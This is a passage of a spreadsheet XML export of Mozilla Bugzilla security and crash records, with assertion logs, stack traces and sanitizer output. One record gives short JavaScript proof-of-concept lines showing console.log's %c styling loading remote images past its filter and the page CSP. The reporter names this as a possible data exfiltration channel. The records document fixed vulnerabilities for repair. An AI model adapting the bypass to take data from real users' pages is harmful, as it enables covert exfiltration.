      <c r="N4125" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4125" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4125" t="inlineStr">
        <is>
          <t>[sg:critical][test check-in moved to bug 733640][qa!]</t>
        </is>
      </c>
      <c r="Q4125" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4125" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4125" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T4125" t="n">
        <v>1</v>
      </c>
      <c r="U4125" t="n">
        <v>0</v>
      </c>
      <c r="V4125" t="n">
        <v>48</v>
      </c>
      <c r="W4125" t="inlineStr">
        <is>
          <t>Created attachment 589002
testcase (crashes trunk)
Description:
This crash seems to be a problem during the layout of the page. It affects the current trunk version and does not crash in Firefox 9.0.1.
The following assertions are hit before a crash on a debug build:
###!!! ASSERTION: this type of frame can't have overflow containers: '(aProperty != nsContainerFrame::OverflowContainersProperty() &amp;&amp; aProperty != nsContainerFrame::ExcessOverflowContainersProperty()) || IsFrameOfType(nsIFrame::eCanContainOverflowContainers)', file ../../../layout/generic/nsContainerFrame.cpp, line 1455
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file ../../../layout/generic/nsContainerFrame.cpp, line 1245
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file ../../../layout/generic/nsContainerFrame.cpp, line 1374 
Affected Versions:
	Firefox 12.0a (trunk)
Testcase:
	A testcase is attached
Stack Backtrace:
On Windows:
xul!nsOverflowContinuationTracker::SetUpListWalker+0x1c
xul!nsAbsoluteContainingBlock::Reflow+0x2bb7e2
xul!nsFrame::ReflowAbsoluteFrames+0x9f
xul!nsIFrame::GetOverflowAreasProperty+0x2b
xul!nsBlockReflowContext::ReflowBlock+0xd1
xul!nsBlockFrame::ReflowBlockFrame+0x46c
xul!nsBlockFrame::ReflowLine+0x13e
xul!nsBlockFrame::ReflowDirtyLines+0x21e
xul!nsBlockFrame::Reflow+0x315
xul!nsBlockReflowContext::ReflowBlock+0xd1
xul!nsBlockFrame::ReflowBlockFrame+0x46c
xul!nsBlockFrame::ReflowLine+0x13e
xul!nsBlockFrame::ReflowDirtyLines+0x21e
xul!nsBlockFrame::Reflow+0x315
xul!nsContainerFrame::ReflowChild+0x6a
xul!nsColumnSetFrame::ReflowChildren+0x294
xul!nsColumnSetFrame::Reflow+0x29a
xul!nsBlockReflowContext::ReflowBlock+0xd1
xul!nsBlockFrame::ReflowBlockFrame+0x46c
xul!nsBlockFrame::ReflowLine+0x13e
It crashes on following instruction:
xul!nsOverflowContinuationTracker::SetUpListWalker+0x1c:
71166a00 ff90b8000000    call    dword ptr [eax+0B8h] ds:002b:f0de80b7=????????
reported by nils of vulndev ltd.</t>
        </is>
      </c>
      <c r="X4125" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4126">
      <c r="A4126" t="n">
        <v>1319157</v>
      </c>
      <c r="B4126" t="inlineStr">
        <is>
          <t>2016-11-21 10:55:33 -0800</t>
        </is>
      </c>
      <c r="C4126" t="inlineStr">
        <is>
          <t>Home button drop handler should urlSecurityCheck all the links in a pipe (|) separated set of URLs dropped on it</t>
        </is>
      </c>
      <c r="D4126" t="inlineStr">
        <is>
          <t>2018-11-05 14:24:15 -0800</t>
        </is>
      </c>
      <c r="E4126" t="n">
        <v>1</v>
      </c>
      <c r="F4126" t="n">
        <v>1</v>
      </c>
      <c r="G4126" t="n">
        <v>2</v>
      </c>
      <c r="H4126" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4126" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4126" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K4126" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4126" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4126" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4126" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4126" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4126" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main60+]</t>
        </is>
      </c>
      <c r="Q4126" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4126" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4126" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T4126" t="n">
        <v>1</v>
      </c>
      <c r="U4126" t="n">
        <v>0</v>
      </c>
      <c r="V4126" t="n">
        <v>11</v>
      </c>
      <c r="W4126" t="inlineStr">
        <is>
          <t>... or just not allow dropping such a set of URLs.</t>
        </is>
      </c>
      <c r="X4126" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4127">
      <c r="A4127" t="n">
        <v>33755</v>
      </c>
      <c r="B4127" t="inlineStr">
        <is>
          <t>2000-03-29 11:09:02 -0800</t>
        </is>
      </c>
      <c r="C4127" t="inlineStr">
        <is>
          <t>Default bug owner of the NSPR Product</t>
        </is>
      </c>
      <c r="D4127" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E4127" t="n">
        <v>1</v>
      </c>
      <c r="F4127" t="n">
        <v>1</v>
      </c>
      <c r="G4127" t="n">
        <v>4</v>
      </c>
      <c r="H4127" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4127" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4127" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4127" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4127" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4127" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4127" t="inlineStr"/>
      <c r="Q4127" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4127" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4127" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T4127" t="n">
        <v>1</v>
      </c>
      <c r="U4127" t="n">
        <v>0</v>
      </c>
      <c r="V4127" t="n">
        <v>5</v>
      </c>
      <c r="W4127" t="inlineStr">
        <is>
          <t>srinivas@netscape.com has left the NSPR group.
Please change the default bug owner and QA
contact of the NSPR Product to wtc@netscape.com.</t>
        </is>
      </c>
      <c r="X4127" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4128">
      <c r="A4128" t="n">
        <v>1800832</v>
      </c>
      <c r="B4128" t="inlineStr">
        <is>
          <t>2022-11-15 23:55:43 -0800</t>
        </is>
      </c>
      <c r="C4128" t="inlineStr">
        <is>
          <t>console.log allows loading images via %c formatter, also bypasses page CSP</t>
        </is>
      </c>
      <c r="D4128" t="inlineStr">
        <is>
          <t>2023-07-17 13:33:59 -0700</t>
        </is>
      </c>
      <c r="E4128" t="n">
        <v>1</v>
      </c>
      <c r="F4128" t="n">
        <v>1</v>
      </c>
      <c r="G4128" t="n">
        <v>3</v>
      </c>
      <c r="H4128" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4128" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J4128" t="inlineStr">
        <is>
          <t>Console</t>
        </is>
      </c>
      <c r="K4128" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4128" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4128" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4128" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4128" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4128" t="inlineStr">
        <is>
          <t>[adv-main109+][adv-esr102.7+]</t>
        </is>
      </c>
      <c r="Q4128" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4128" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4128" t="inlineStr">
        <is>
          <t>110 Branch</t>
        </is>
      </c>
      <c r="T4128" t="n">
        <v>1</v>
      </c>
      <c r="U4128" t="n">
        <v>0</v>
      </c>
      <c r="V4128" t="n">
        <v>13</v>
      </c>
      <c r="W4128" t="inlineStr">
        <is>
          <t>Despite attempting to filter out loading URLs from the styles supported by the console.log() `%c` format directive, this is done by fragile regexp and can be bypassed.
Inspired by recently-unhidden https://bugs.chromium.org/p/chromium/issues/detail?id=1349493.
### #1 loading a remote image
The second example in that chrome bug works in Firefox, for pretty much the same reasons: the regexp is trying to forbid bad stuff rather than saying "no `url()` at all unless it's a data: url"  (support for data: was added in bug 1579663 by removing it from the list of bad schemes). Find a weakness in the regexp and you can get around it. You can copy the line below and run it in a devtool console
```javascript
console.log("%cMozilla", "background:url(https\\0009://www.mozilla.org/favicon.ico); font-size:50px; border:solid green; margin:50px; padding:50px; display:inline-block;")
```
### #2 CSP bypass
If you make the console.log() call from the page content this also bypasses the page CSP. On the one hand the image isn't being incorporated into the page content, but on the other it could be used as a way to exfiltrate data. I assume we can't apply the page's CSP to the toolbox without breaking a bunch of things, so fixing this comes down to preventing console logging from loading external images at all.
The intended "data:" urls might also violate the CSP, but since there's no exfiltration avenue it seems fine to allow it.
### #3 no restriction on other schemes
There is a [forbidden list of schemes](https://searchfox.org/mozilla-central/rev/d7d2cc647772de15c4c5aa47f74d25d0e379e404/devtools/client/shared/components/reps/reps/rep-utils.js#492-493) which means any new scheme we think up won't be on it. For example, Firefox supports `moz-extension` urls so you could use any web-accessible resource, if you can figure out the random UUID assigned to each extension at install time. Some extensions make this easy by injecting elements into web content where they can be detected.
Take the case of Firefox Relay, for example. If your victim has Relay installed and active you could go to a page with an email field (like any page on www.mozilla.org) and do something like:
```javascript
let relayUrl = document.querySelector("#fx-relay-button")?.style["background-image"];
console.log("%cMozilla", `background:${relayUrl}; font-size:50px; border:solid green; margin:50px; padding:50px; display:inline-block;`)
```
`moz-extension://` itself isn't a problem (like `data:`, nothing is exfiltrated) but it shows the limitations of the regexp.</t>
        </is>
      </c>
      <c r="X4128" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4129">
      <c r="A4129" t="n">
        <v>88327</v>
      </c>
      <c r="B4129" t="inlineStr">
        <is>
          <t>2001-06-28 18:09:23 -0700</t>
        </is>
      </c>
      <c r="C4129" t="inlineStr">
        <is>
          <t>XML Extras doesn't support international charsets</t>
        </is>
      </c>
      <c r="D4129" t="inlineStr">
        <is>
          <t>2001-07-11 13:43:04 -0700</t>
        </is>
      </c>
      <c r="E4129" t="n">
        <v>1</v>
      </c>
      <c r="F4129" t="n">
        <v>1</v>
      </c>
      <c r="G4129" t="n">
        <v>3</v>
      </c>
      <c r="H4129" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4129" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4129" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K4129" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4129" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4129" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4129" t="inlineStr">
        <is>
          <t>[pdt+][DIGBug][fixinhand]</t>
        </is>
      </c>
      <c r="Q4129" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4129" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4129" t="inlineStr">
        <is>
          <t>mozilla0.9.3</t>
        </is>
      </c>
      <c r="T4129" t="n">
        <v>1</v>
      </c>
      <c r="U4129" t="n">
        <v>0</v>
      </c>
      <c r="V4129" t="n">
        <v>21</v>
      </c>
      <c r="W4129" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
BuildID:    2001060704
It looks like the XMLExtras objects assumes the response data is in the ISO8859-
1 charset.  It ignores the charset part of the content type header that gets 
sent with the response.
- Sandip
Reproducible: Always
Steps to Reproduce:
1) Submit a query using the XMLExtras send API
2) Have the server respond with an HTML page that contains non-ascii
   characters.
      a) I tested I18N support using "gb2312" simplified-chinese
      b) Set the content type to: text/html; charset-gb2312
      c) Send the html containing the chinese chars
      d) Using the req.responseText API the characters are not
         converted correctly byt he XMLExtra object.  It appears the
         object *ignores* the charset specified in the content-type.
Actual Results:  The resulting string doesn't have the correct set of 
characters.  It looks like the XML extras object just takes each byte and 
stores them into the string without *any* character conversion.
Expected Results:  It should have converted the byte stream based on the 
character set specified in the content type header.  Once this happens, the 
responseText attribute will have the correct representation of the string.</t>
        </is>
      </c>
      <c r="X4129" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4130">
      <c r="A4130" t="n">
        <v>879139</v>
      </c>
      <c r="B4130" t="inlineStr">
        <is>
          <t>2013-06-03 22:29:30 -0700</t>
        </is>
      </c>
      <c r="C4130" t="inlineStr">
        <is>
          <t>Use-after-free with SVG animation in SVG image</t>
        </is>
      </c>
      <c r="D4130" t="inlineStr">
        <is>
          <t>2014-05-05 18:27:00 -0700</t>
        </is>
      </c>
      <c r="E4130" t="n">
        <v>1</v>
      </c>
      <c r="F4130" t="n">
        <v>1</v>
      </c>
      <c r="G4130" t="n">
        <v>3</v>
      </c>
      <c r="H4130" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4130" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4130" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K4130" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4130" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4130" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4130" t="inlineStr">
        <is>
          <t>[fixed by bug 883416][adv-main23+]</t>
        </is>
      </c>
      <c r="Q4130" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4130" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4130" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4130" t="n">
        <v>1</v>
      </c>
      <c r="U4130" t="n">
        <v>0</v>
      </c>
      <c r="V4130" t="n">
        <v>30</v>
      </c>
      <c r="W4130" t="inlineStr">
        <is>
          <t>Created attachment 757807
testcase (see comment 0)
With:
     user_pref("privacy.sanitize.sanitizeOnShutdown", true);
The testcase causes a crash on shutdown.
==40362== ERROR: AddressSanitizer heap-use-after-free on address 0x000146dcc780 at pc 0x10c3379a1 bp 0x7fff5fbeae50 sp 0x7fff5fbeae48
READ of size 8 at 0x000146dcc780 thread T0
    #0 0x10c33799f in nsNodeUtils::LastRelease [nsNodeUtils.cpp:187]
    #1 0x10b9e6fda in mozilla::dom::FragmentOrElement::Release [FragmentOrElement.cpp:1711]
    #2 0x111e73b11 in nsSVGElement::Release [nsSVGElement.cpp:229]
    #3 0x111c013e1 in mozilla::dom::SVGGraphicsElement::Release [SVGGraphicsElement.cpp:15]
    #4 0x111d52f51 in mozilla::dom::SVGSVGElement::Release [SVGSVGElement.cpp:143]
    #5 0x119d1bfc8 in nsXPCOMCycleCollectionParticipant::UnrootImpl [nsCycleCollectionParticipant.cpp:38]
    #6 0x11a1dfd19 in nsCycleCollector::CollectWhite [nsCycleCollector.cpp:2432]
    #7 0x11a1d107f in nsCycleCollector::FinishCollection [nsCycleCollector.cpp:2883]
    #8 0x11a1e3aec in nsCycleCollector::ShutdownCollect [nsCycleCollector.cpp:2767]
    #9 0x11a1e514e in nsCycleCollector::Shutdown [nsCycleCollector.cpp:2917]
    #10 0x11a1e7e11 in nsCycleCollector_shutdown [nsCycleCollector.cpp:3116]
    #11 0x119d709c7 in mozilla::ShutdownXPCOM [nsXPComInit.cpp:651]
    #12 0x119d6fc58 in NS_ShutdownXPCOM [nsXPComInit.cpp:540]
    #13 0x1068e3a62 in ScopedXPCOMStartup::~ScopedXPCOMStartup [nsAppRunner.cpp:1125]
    #14 0x1068e35a8 in ScopedXPCOMStartup::~ScopedXPCOMStartup [nsAppRunner.cpp:1106]
    #15 0x10690c310 in XREMain::XRE_main [nsAppRunner.cpp:3944]
    #16 0x10690db22 in XRE_main [nsAppRunner.cpp:4121]
    #17 0x1000083ec in do_main [nsBrowserApp.cpp:272]
    #18 0x100004b02 in main [nsBrowserApp.cpp:632]
    #19 0x1000015c3 in start (in firefox-bin) + 51
    #20 0x5 in 0x00000005 (in firefox-bin)
Same symptoms as bug 851416, pretty much.</t>
        </is>
      </c>
      <c r="X4130" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4131">
      <c r="A4131" t="n">
        <v>1262364</v>
      </c>
      <c r="B4131" t="inlineStr">
        <is>
          <t>2016-04-06 00:56:55 -0700</t>
        </is>
      </c>
      <c r="C4131" t="inlineStr">
        <is>
          <t>Implement the PM2.5 station with Arduino</t>
        </is>
      </c>
      <c r="D4131" t="inlineStr">
        <is>
          <t>2016-04-06 00:57:25 -0700</t>
        </is>
      </c>
      <c r="E4131" t="n">
        <v>1</v>
      </c>
      <c r="F4131" t="n">
        <v>1</v>
      </c>
      <c r="G4131" t="n">
        <v>6</v>
      </c>
      <c r="H4131" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4131" t="inlineStr">
        <is>
          <t>Connected Devices Graveyard</t>
        </is>
      </c>
      <c r="J4131" t="inlineStr">
        <is>
          <t>Project Sensor Web</t>
        </is>
      </c>
      <c r="K4131" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4131" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4131" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4131" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4131" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4131" t="inlineStr"/>
      <c r="Q4131" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4131" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4131" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4131" t="n">
        <v>1</v>
      </c>
      <c r="U4131" t="n">
        <v>0</v>
      </c>
      <c r="V4131" t="n">
        <v>2</v>
      </c>
      <c r="W4131" t="inlineStr">
        <is>
          <t>Implement the PM2.5 station with Arduino.</t>
        </is>
      </c>
      <c r="X4131" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4132">
      <c r="A4132" t="n">
        <v>720305</v>
      </c>
      <c r="B4132" t="inlineStr">
        <is>
          <t>2012-01-22 23:09:38 -0800</t>
        </is>
      </c>
      <c r="C4132" t="inlineStr">
        <is>
          <t>"Assertion failure: compartment mismatched" with nodelist, custom length setter</t>
        </is>
      </c>
      <c r="D4132" t="inlineStr">
        <is>
          <t>2012-06-02 12:00:11 -0700</t>
        </is>
      </c>
      <c r="E4132" t="n">
        <v>1</v>
      </c>
      <c r="F4132" t="n">
        <v>1</v>
      </c>
      <c r="G4132" t="n">
        <v>3</v>
      </c>
      <c r="H4132" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4132" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4132" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4132" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4132" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4132" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4132" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4132" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4132" t="inlineStr">
        <is>
          <t>[sg:critical][qa+]</t>
        </is>
      </c>
      <c r="Q4132" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4132" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4132" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T4132" t="n">
        <v>1</v>
      </c>
      <c r="U4132" t="n">
        <v>0</v>
      </c>
      <c r="V4132" t="n">
        <v>15</v>
      </c>
      <c r="W4132" t="inlineStr">
        <is>
          <t>Created attachment 590635
testcase (asserts fatally when loaded)</t>
        </is>
      </c>
      <c r="X4132" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4133">
      <c r="A4133" t="n">
        <v>1654211</v>
      </c>
      <c r="B4133" t="inlineStr">
        <is>
          <t>2020-07-21 01:18:04 -0700</t>
        </is>
      </c>
      <c r="C4133" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free [@ ~BorrowedSourceSurface] with READ of size 8</t>
        </is>
      </c>
      <c r="D4133" t="inlineStr">
        <is>
          <t>2024-05-30 10:16:53 -0700</t>
        </is>
      </c>
      <c r="E4133" t="n">
        <v>1</v>
      </c>
      <c r="F4133" t="n">
        <v>1</v>
      </c>
      <c r="G4133" t="n">
        <v>3</v>
      </c>
      <c r="H4133" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4133" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4133" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4133" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4133" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4133" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4133" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4133" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4133" t="inlineStr">
        <is>
          <t>[sec-survey][post-critsmash-triage][adv-main81+]</t>
        </is>
      </c>
      <c r="Q4133" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4133" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4133" t="inlineStr">
        <is>
          <t>82 Branch</t>
        </is>
      </c>
      <c r="T4133" t="n">
        <v>1</v>
      </c>
      <c r="U4133" t="n">
        <v>0</v>
      </c>
      <c r="V4133" t="n">
        <v>21</v>
      </c>
      <c r="W4133" t="inlineStr">
        <is>
          <t>The attached crash information was submitted via the ASan Nightly Reporter on mozilla-central-asan-nightly revision 80.0a1-20200719090414-https://hg.mozilla.org/mozilla-central/rev/e785ebabf7e142898e31a6c81a4d43d44eff39e3.
For detailed crash information, see attachment.</t>
        </is>
      </c>
      <c r="X4133" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4134">
      <c r="A4134" t="n">
        <v>1412124</v>
      </c>
      <c r="B4134" t="inlineStr">
        <is>
          <t>2017-10-26 15:10:23 -0700</t>
        </is>
      </c>
      <c r="C4134" t="inlineStr">
        <is>
          <t>Dont Show Browser Chrome when opening a link in the background</t>
        </is>
      </c>
      <c r="D4134" t="inlineStr">
        <is>
          <t>2017-10-30 06:20:37 -0700</t>
        </is>
      </c>
      <c r="E4134" t="n">
        <v>1</v>
      </c>
      <c r="F4134" t="n">
        <v>1</v>
      </c>
      <c r="G4134" t="n">
        <v>2</v>
      </c>
      <c r="H4134" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4134" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4134" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K4134" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4134" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4134" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4134" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4134" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4134" t="inlineStr"/>
      <c r="Q4134" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4134" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4134" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4134" t="n">
        <v>1</v>
      </c>
      <c r="U4134" t="n">
        <v>0</v>
      </c>
      <c r="V4134" t="n">
        <v>5</v>
      </c>
      <c r="W4134" t="inlineStr">
        <is>
          <t>From the SurveyGizmo feedback
"When opening a link in a new (private) tab, the address bar and navigation buttons (at the top and bottom, respectively) show up again, after having disappeared due to scrolling down. I find this behavior a little annoying, as it slightly shifts my position on the page."
Seems like a reasonable request. I think with the new toast to switch to the tab right away I dont think we need to show the UI chrome.</t>
        </is>
      </c>
      <c r="X4134" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4135">
      <c r="A4135" t="n">
        <v>4224</v>
      </c>
      <c r="B4135" t="inlineStr">
        <is>
          <t>1999-03-23 22:11:42 -0800</t>
        </is>
      </c>
      <c r="C4135" t="inlineStr">
        <is>
          <t>Mac crashes on startup in XPCOM</t>
        </is>
      </c>
      <c r="D4135" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:47 -0700</t>
        </is>
      </c>
      <c r="E4135" t="n">
        <v>1</v>
      </c>
      <c r="F4135" t="n">
        <v>1</v>
      </c>
      <c r="G4135" t="n">
        <v>3</v>
      </c>
      <c r="H4135" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4135" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4135" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4135" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4135" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4135" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N4135" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4135" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4135" t="inlineStr"/>
      <c r="Q4135" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4135" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4135" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4135" t="n">
        <v>1</v>
      </c>
      <c r="U4135" t="n">
        <v>0</v>
      </c>
      <c r="V4135" t="n">
        <v>5</v>
      </c>
      <c r="W4135" t="inlineStr">
        <is>
          <t>After dp's changes today, Mac apprunner is crashing on startup, with an
infinite recursion in the auto registration code:
  Calling chain using A6/R1 links
  Back chain  ISA  Caller
  00000000    PPC  17B65A40
  04762180    PPC  17B645E8  main+00090
  047620A0    PPC  17B657D0  NS_SetupRegistry_1+00014
  04762060    PPC  17B64D7C  NS_SetupRegistry+0002C
  04762020    PPC  16AC1B04  nsComponentManager::RegisterComponent(const nsID&amp;,
const char*, const char*, const char*, int, int)+0002C
  04761FD0    PPC  16AD410C  NS_GetGlobalComponentManager(nsIComponentManager**)+
0002C
  04761F90    PPC  16AC7BB4  NS_InitXPCOM(nsIServiceManager**)+000F0
  04761F20    PPC  16AD00F0  nsComponentManagerImpl::Init()+0019C
  04761ED0    PPC  16AD35BC
nsComponentManagerImpl::AutoRegister(nsIComponentManager::RegistrationTime, const
char*)+0022C
  04761C40    PPC  16AD3744
nsComponentManagerImpl::SyncComponentsInPathList(const char*)+00094
  04761BF0    PPC  16AD3880  nsComponentManagerImpl::SyncComponentsInDir(const
char*)+000AC
  04761790    PPC  16AD3E10  nsComponentManagerImpl::SyncComponentsInFile(const
char*)+004D0
  04761640    PPC  16AD406C  nsComponentManagerImpl::SelfRegisterDll(nsDll*)+
0015C
  047611E0    PPC  15961EF8  NSRegisterSelf+000D4
  04761160    PPC  16AC6D4C  nsServiceManagerImpl::GetService(const nsID&amp;, const
nsID&amp;, nsISupports**, nsIShutdownListener*)+00118
  047610D0    PPC  16AC1880  nsComponentManager::CreateInstance(const nsID&amp;,
nsISupports*, const nsID&amp;, void**)+00024
